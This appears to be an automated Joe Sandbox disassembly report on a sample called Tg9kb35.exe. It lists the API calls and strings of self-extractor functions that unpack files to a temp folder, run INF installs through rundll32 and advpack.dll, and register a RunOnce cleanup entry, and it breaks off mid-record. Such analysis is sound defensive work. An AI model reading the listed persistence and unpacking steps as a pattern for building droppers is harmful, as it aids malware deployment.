Function 004C6952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`WL,?,00000000,004C5760,?,A:\), ref: 004C697F
MulDiv.KERNEL32(?,?,00000400), ref: 004C6999

Strings

`WL, xrefs: 004C6972, 004C6975

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: DiskFreeSpace
String ID: `WL
API String ID: 1705453755-1023857690
Opcode ID: fd3c75c3251e5781a0489bcf3d71d5f5456b069d1012d70a2b67d6e4cb926bc4
Instruction ID: 408e49acaa534b5aaa33565371cd6e849c526e73341ba33598f686f2afa79a0a
Opcode Fuzzy Hash: fd3c75c3251e5781a0489bcf3d71d5f5456b069d1012d70a2b67d6e4cb926bc4
Instruction Fuzzy Hash: 27F0E7B6D0022CBBCB11DFE88844EDEBBBCEB48700F1441ABA510E2240DA719A108B95

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Tg9kb35.exePID: 6588, Parent PID: 6796COMMON

Execution Graph

Execution Coverage:	27.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	971
Total number of Limit Nodes:	47

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00ED3BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00ED3C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00ED3CDC

Part of subcall function 00ED468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00ED46A0
Part of subcall function 00ED468F: SizeofResource.KERNEL32(00000000,00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46A9
Part of subcall function 00ED468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00ED46C3
Part of subcall function 00ED468F: LoadResource.KERNEL32(00000000,00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46CC
Part of subcall function 00ED468F: LockResource.KERNEL32(00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46D3
Part of subcall function 00ED468F: memcpy_s.MSVCRT ref: 00ED46E5
Part of subcall function 00ED468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00ED8C42), ref: 00ED3D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00ED3E26
FreeLibrary.KERNEL32(00000000,?,00ED8C42), ref: 00ED3EFF
LocalFree.KERNEL32(?,?,?,?,00ED8C42), ref: 00ED3F1F
FreeLibrary.KERNEL32(00000000,?,00ED8C42), ref: 00ED3F40
LocalFree.KERNEL32(?,?,?,?,00ED8C42), ref: 00ED3F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00ED8C42), ref: 00ED3F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00ED8C42), ref: 00ED3F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00ED8C42), ref: 00ED3FC2

Strings

advpack.dll, xrefs: 00ED3F9D
SHOWWINDOW, xrefs: 00ED3C34
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00ED3E74
DoInfInstall, xrefs: 00ED3E1F, 00ED3E24, 00ED3F68
USRQCMD, xrefs: 00ED3CAD
REBOOT, xrefs: 00ED3BE2
RUNPROGRAM, xrefs: 00ED3D05
<None>, xrefs: 00ED3CC9, 00ED3D7D
smo, xrefs: 00ED3E68
D, xrefs: 00ED3C19
POSTRUNPROGRAM, xrefs: 00ED3D60
ADMQCMD, xrefs: 00ED3C9E

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$smo
API String ID: 1032054927-1275553841
Opcode ID: f9882415a513d0d3f20ba48329a5ace98b76a985afe694d436db822c505969ed
Instruction ID: 7b59f5b5561865b4d53cec40c962361d0f38553f873843f7162662b57cab630b
Opcode Fuzzy Hash: f9882415a513d0d3f20ba48329a5ace98b76a985afe694d436db822c505969ed
Instruction Fuzzy Hash: 73B101706093009FD3209F359945BAAB7E5EB84704F10292BFA95F63E1DB70CA4ACB53

Uniqueness

Uniqueness Score: -1.00%

Function 00ED1AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00ED1BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00ED1BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00ED1C57
GetPrivateProfileIntA.KERNEL32(?,Reboot,00000000,?), ref: 00ED1C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00ED1140,00000000,00000008,?), ref: 00ED1CB8
GetShortPathNameA.KERNEL32(?,?,00000104), ref: 00ED1D1B

Part of subcall function 00ED44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00ED4518
Part of subcall function 00ED44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 00ED4554

Strings

Version, xrefs: 00ED1CB3
AdvancedINF, xrefs: 00ED1CAE
.INF, xrefs: 00ED1BDB
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00ED1BA0
DefaultInstall, xrefs: 00ED1C74, 00ED1C87, 00ED1CCE, 00ED1CD3, 00ED1D2D, 00ED1D39
setupx.dll, xrefs: 00ED1D14
Command.com /c %s, xrefs: 00ED1D9B, 00ED1DE8
", xrefs: 00ED1B25
setupapi.dll, xrefs: 00ED1D23, 00ED1D3A
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00ED1D3B
Reboot, xrefs: 00ED1C82
.BAT, xrefs: 00ED1D83

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-852641736
Opcode ID: 8f839818a34ed2bc2780975d8c7bd94144cc3c3b9242a6cf895f7bc0cfe65f8d
Instruction ID: 4447321b57e3b5f9a94284485df13b235165386e99f60705c77fa546975a11fb
Opcode Fuzzy Hash: 8f839818a34ed2bc2780975d8c7bd94144cc3c3b9242a6cf895f7bc0cfe65f8d
Instruction Fuzzy Hash: 8AA14870A012187FEB209B24DC45BEA77AADB91314F1422E7E555B73C1DBB08E8BCB50

Uniqueness

Uniqueness Score: -1.00%

Function 00ED2F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000105), ref: 00ED2F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00ED2FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00ED2FC6
DecryptFileA.ADVAPI32 ref: 00ED2FE6
FreeLibrary.KERNEL32(00000000), ref: 00ED2FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00ED301C

Part of subcall function 00ED51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00ED2F4D,?,00000002,00000000), ref: 00ED5201

Strings

advapi32.dll, xrefs: 00ED2F99
DecryptFileA, xrefs: 00ED2FC0
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00ED2FDB, 00ED3017

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-2099937843
Opcode ID: e46a6e6afd5a26b96ef4676b469965b1b7fd7edc9c243c01916a106590a0a925
Instruction ID: 4331082e9bb181bbafb25d99d449fead00023de315cc55676e6823942b4009a8
Opcode Fuzzy Hash: e46a6e6afd5a26b96ef4676b469965b1b7fd7edc9c243c01916a106590a0a925
Instruction Fuzzy Hash: 8241DA316022159EDB30AB72BD4575A33E8DB54758F002567E941F2392EF74CE8BCA62

Uniqueness

Uniqueness Score: -1.00%

Function 00ED2390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE(?,00ED8A3A,00ED11F4,00ED8A3A,00000000,?,?), ref: 00ED23F6
lstrcmpA.KERNEL32(?,00ED11F8), ref: 00ED2427
lstrcmpA.KERNEL32(?,00ED11FC), ref: 00ED243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00ED2495
DeleteFileA.KERNEL32(?), ref: 00ED24A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 00ED24AF
FindClose.KERNELBASE(00000000), ref: 00ED24BE
RemoveDirectoryA.KERNELBASE(00ED8A3A), ref: 00ED24C5

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 60f27cca47dbca6b98b13321a2d3cef514b34dbfdc3d1ac863f5a79840b238f1
Instruction ID: 53636ca260c636deebdb9d37ab04de81b56299b5dd6225b17dac4552108dcbd8
Opcode Fuzzy Hash: 60f27cca47dbca6b98b13321a2d3cef514b34dbfdc3d1ac863f5a79840b238f1
Instruction Fuzzy Hash: BA318332205740AFC320DBA4DD49AEB73ECEBC4305F04592FB965A6390EB34990E8752

Uniqueness

Uniqueness Score: -1.00%

Function 00ED2BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,00ED6BB0,00ED0000,00000000,00000002,0000000A), ref: 00ED2C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,00ED6BB0,00ED0000,00000000,00000002,0000000A), ref: 00ED2C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00ED2C28
CloseHandle.KERNEL32(00000000,?,?,00ED6BB0,00ED0000,00000000,00000002,0000000A), ref: 00ED2C98

Strings

Kernel32.dll, xrefs: 00ED2C13
HeapSetInformation, xrefs: 00ED2C22

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: cf830e0d53e6583f2dbbc741911dbae8723c82bab944700175cdc2f157a2420d
Instruction ID: cce70e33b274c285a1984e425b2a597c93e27c9721538bb49c59df6c28302da3
Opcode Fuzzy Hash: cf830e0d53e6583f2dbbc741911dbae8723c82bab944700175cdc2f157a2420d
Instruction Fuzzy Hash: 431106312123016FC7207BB6BD49A2FB7A9DB54384B09202BFA10F7355CA31DC078661

Uniqueness

Uniqueness Score: -1.00%

Function 00ED202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00ED2050
memset.MSVCRT ref: 00ED205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00ED208C

Part of subcall function 00ED171E: _vsnprintf.MSVCRT ref: 00ED1750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00ED20C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00ED20EA
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00ED2103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00ED2122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00ED2134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00ED2144
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00ED215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00ED218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00ED21C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00ED21E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00ED223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00ED2249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00ED2250

Strings

advpack.dll, xrefs: 00ED2109
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00ED21A8, 00ED2204
wextract_cleanup2, xrefs: 00ED20A5, 00ED20BE, 00ED20F0, 00ED2232
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00ED2082
wextract_cleanup%d, xrefs: 00ED209E
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00ED21F6
DelNodeRunDLL32, xrefs: 00ED212E
%s /D:%s, xrefs: 00ED21FF, 00ED2210

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
API String ID: 178549006-2699677747
Opcode ID: 30a1aab41c2195004f4e49f2b13490655dd92e83ca2a41a393b7583f9a391cf5
Instruction ID: 1dc232ee554899fb5595048cc8aad0854d18e81ee54239d5f9f0415bb71fc705
Opcode Fuzzy Hash: 30a1aab41c2195004f4e49f2b13490655dd92e83ca2a41a393b7583f9a391cf5
Instruction Fuzzy Hash: 4B510871A02214AFDB209B61EC49FFB777CEB50700F0451ABFA45F7291DA719E4A8A60

Uniqueness

Uniqueness Score: -1.00%

Function 00ED55A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00ED468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00ED46A0
Part of subcall function 00ED468F: SizeofResource.KERNEL32(00000000,00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46A9
Part of subcall function 00ED468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00ED46C3
Part of subcall function 00ED468F: LoadResource.KERNEL32(00000000,00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46CC
Part of subcall function 00ED468F: LockResource.KERNEL32(00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46D3
Part of subcall function 00ED468F: memcpy_s.MSVCRT ref: 00ED46E5
Part of subcall function 00ED468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00ED55CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00ED5638
LocalFree.KERNEL32(00000000), ref: 00ED564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00ED5620

Part of subcall function 00ED44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00ED4518
Part of subcall function 00ED44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 00ED4554

Part of subcall function 00ED6285: GetLastError.KERNEL32(00ED5BBC), ref: 00ED6285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00ED56B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00ED571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00ED5737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00ED57CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00ED57EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00ED5802

Part of subcall function 00ED2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00ED2654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00ED5830

Part of subcall function 00ED6517: FindResourceA.KERNEL32(00ED0000,000007D6,00000005), ref: 00ED652A
Part of subcall function 00ED6517: LoadResource.KERNEL32(00ED0000,00000000,?,?,00ED2EE8,00000000,00ED19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00ED6538
Part of subcall function 00ED6517: DialogBoxIndirectParamA.USER32(00ED0000,00000000,00000547,00ED19E0,00000000), ref: 00ED6557
Part of subcall function 00ED6517: FreeResource.KERNEL32(00000000,?,?,00ED2EE8,00000000,00ED19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00ED6560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00ED5878

Part of subcall function 00ED597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00ED59A8
Part of subcall function 00ED597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00ED59AF

Strings

msdownld.tmp, xrefs: 00ED57D3
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00ED56AE, 00ED56B3, 00ED583D
RUNPROGRAM, xrefs: 00ED55BD, 00ED5600
<None>, xrefs: 00ED5632
A:\, xrefs: 00ED56F4
Z, xrefs: 00ED570A

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-2610921595
Opcode ID: 49ceedcb9b3be7d0298a7fcc4e084677555f6593db050f7fd944bf47dfab7769
Instruction ID: 2bbf4ba9379936601f932e04901729243bdbfbc5a42b08f86b98e8d1aa67d0b9
Opcode Fuzzy Hash: 49ceedcb9b3be7d0298a7fcc4e084677555f6593db050f7fd944bf47dfab7769
Instruction Fuzzy Hash: 33812972A05A149BDB24AB71AC41BEA73ADDB60304F1420B7F596F2391DE70CEC78A51

Uniqueness

Uniqueness Score: -1.00%

Function 00ED2CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00ED2CD9
memset.MSVCRT ref: 00ED2CE9
memset.MSVCRT ref: 00ED2CF9

Part of subcall function 00ED468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00ED46A0
Part of subcall function 00ED468F: SizeofResource.KERNEL32(00000000,00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46A9
Part of subcall function 00ED468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00ED46C3
Part of subcall function 00ED468F: LoadResource.KERNEL32(00000000,00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46CC
Part of subcall function 00ED468F: LockResource.KERNEL32(00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46D3
Part of subcall function 00ED468F: memcpy_s.MSVCRT ref: 00ED46E5
Part of subcall function 00ED468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED2D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED2D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED2DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00ED2DBD
CloseHandle.KERNEL32(smo,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED2E0A

Part of subcall function 00ED44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00ED4518
Part of subcall function 00ED44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 00ED4554

Strings

INSTANCECHECK, xrefs: 00ED2D95
EXTRACTOPT, xrefs: 00ED2D4D
VERCHECK, xrefs: 00ED2E54
TITLE, xrefs: 00ED2D09
smo, xrefs: 00ED2D04, 00ED2DD9, 00ED2DF0

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$smo
API String ID: 1002816675-4137116347
Opcode ID: c293ee01207fb8d91331802dae01440f0c9f023fad94a2b037677b2086aee1e3
Instruction ID: 6c0245040427d02ac0e60a0fb50c87f525830c5682b14005dd0941a016686a2a
Opcode Fuzzy Hash: c293ee01207fb8d91331802dae01440f0c9f023fad94a2b037677b2086aee1e3
Instruction Fuzzy Hash: 1551F7703423016FE7116772AD4AB7A2799D7A5704F04642FBA41F93E1DAB48847D611

Uniqueness

Uniqueness Score: -1.00%

Function 00ED597D Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00ED59A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 00ED59AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00ED5A13
MulDiv.KERNEL32(?,?,00000400), ref: 00ED5A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00ED5A64
memset.MSVCRT ref: 00ED5A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00ED5A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00ED5AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00ED5BFC

Part of subcall function 00ED44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00ED4518
Part of subcall function 00ED44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 00ED4554

Part of subcall function 00ED6285: GetLastError.KERNEL32(00ED5BBC), ref: 00ED6285

Strings

wb, xrefs: 00ED5B8C

Memory Dump Source

